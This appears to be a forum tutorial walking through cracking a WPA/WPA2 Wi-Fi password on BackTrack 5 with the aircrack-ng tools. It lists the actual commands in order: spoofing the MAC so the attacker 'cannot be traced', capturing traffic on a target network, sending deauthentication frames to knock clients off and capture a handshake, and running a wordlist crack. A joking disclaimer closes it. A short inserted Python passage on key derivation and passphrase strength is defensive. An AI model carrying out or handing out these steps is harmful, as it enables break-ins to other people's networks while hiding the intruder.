Here I will explain how to crack a WPA or WPA2 network
with the Linux distro called BackTrack 5, from the following link
---
Requirements:
• BackTrack on CD or USB
• Computer with a compatible 802.11 WLAN card
• Wireless access point or WiFi router using WPA/WPA2 encryption
• A wordlist (use Google, you will find many)
---
1. Start BackTrack
Boot from your USB stick or your CD/DVD (depending on which BackTrack version you have).
Now start BackTrack.
After the boot process is finished you have to type:
fixvesa
and then:
startx
and press Enter to get to the graphical interface of BackTrack.
-
2. Now we start!
Open a shell.
Here type:
airmon-ng
to find out what your WiFi adapter is called.
-
3. Change the MAC
Now you know the name of your adapter (in my case it is wlan0, so from now on I use wlan0 as the interface).
You should change your MAC address so that it cannot be traced back to you later.
Code below:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac (any MAC) wlan0
airmon-ng start wlan0
It should look like this:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
-
4. Choose the network
Now you type in the same shell:
airodump-ng wlan0
Now it scans for networks.
On the left we see the BSSID, which is basically the MAC address of the router.
When the desired network has been found, we press Ctrl + C to stop the whole process.
Now you copy the BSSID of the desired network.
5. Let's go
Now you have to find the channel.
With:
airodump-ng -c (channel) -w (filename; it does not matter what, just take 'wpa' or something easy to remember) --bssid (BSSID) wlan0
we write our received data to a file.
For example:
airodump-ng -c 11 -w wpa --bssid 00:14:F8:4F:14:1A wlan0
With this command we write all data received from our WiFi network XY with the BSSID 00:14:F8:4F:14:1A,
transmitting on channel 11, into the file 'wpa-01.cap'.
On WPA/WPA2 it is not possible to decrypt the password directly, as on WEP.
For this we need a 'handshake'.
-
6. The handshake
Our client is connected to the router, which sends the password in encrypted form with every new connection.
We might wait (likely) forever for our client to reconnect.
But we do not have to.
In our shell we see at the bottom who else is online. If we get a handshake,
we see it at the top right of the shell; it then says 'handshake'.
We now open a new shell to throw our clients out so that they have to reconnect.
And type:
aireplay-ng -0 5 -a (BSSID) wlan0
5 is the number of attempts we want to make.
But it is not guaranteed that this works, because newer routers do not allow this anymore.
How do we get the client to disconnect?
It is relatively simple. We tell the router: "Hello, I'm user XY and would like to log out."
So we throw the client out:
aireplay-ng -0 1 -a (BSSID) -c (client MAC) wlan0
The client MAC is shown at the bottom of shell 1.
Now we should have a handshake.
-
7. Crack it!
If we have a handshake, we can close all our shells undisturbed and open a new one.
In this we type:
aircrack-ng (filename)-01.cap
Now we need the wordlist.
Our wordlist is, for example, here:
/home/wordlists
In my example the wordlist is called 'Wlist.txt'.
Now we enter the following in the shell:
aircrack-ng (filename)-01.cap -w (path to the wordlist)
For me it would look like this:
aircrack-ng wpa-01.cap -w /home/wordlists/Wlist.txt
Now the program tests every word to see whether it matches the encrypted handshake.
If the password is found, it is shown and you're done.
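As an added illustration (not part of the original post) of what the last step actually computes: for every wordlist entry, aircrack-ng derives the PMK with PBKDF2-HMAC-SHA1 (SSID as salt, 4096 iterations) and checks it against the captured handshake. The snippet below reproduces only that PMK derivation, checks it against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), and estimates how long exhausting a wordlist versus a random passphrase would take at an assumed guess rate, which is why a long random passphrase and a non-default SSID defeat this attack.

```python
import hashlib


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-Personal PMK the way the standard defines it:
    PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Passphrases must be 8 to 63 printable ASCII characters."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of passphrases of a fixed length drawn from a given alphabet."""
    return alphabet_size ** length


def seconds_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Worst-case time to derive a PMK for every candidate at a given rate."""
    return candidates / guesses_per_second


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
    print(wpa2_pmk("password", "IEEE").hex())
    # The SSID salts the derivation: the same passphrase on another SSID
    # gives a different PMK, so precomputed tables only help for common SSIDs.
    print(wpa2_pmk("password", "linksys") != wpa2_pmk("password", "IEEE"))
    # Assumed rate of 5,000 PMK derivations per second (a constructed figure),
    # a constructed 1,000,000-entry wordlist versus 12 random alphanumerics.
    print(seconds_to_exhaust(1_000_000, 5_000), "seconds for the wordlist")
    years = seconds_to_exhaust(keyspace(62, 12), 5_000) / (365 * 86400)
    print(f"{years:.3g} years for a random 12-character passphrase")
```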
-
NOTE: THAT'S NOT FOR ILLEGAL HACKING, IT'S FOR TESTING YOUR OWN SECURITY!!!! LOL
I'M NOT RESPONSIBLE FOR ANYTHING!!!! GREEEEEETZ!!!!!!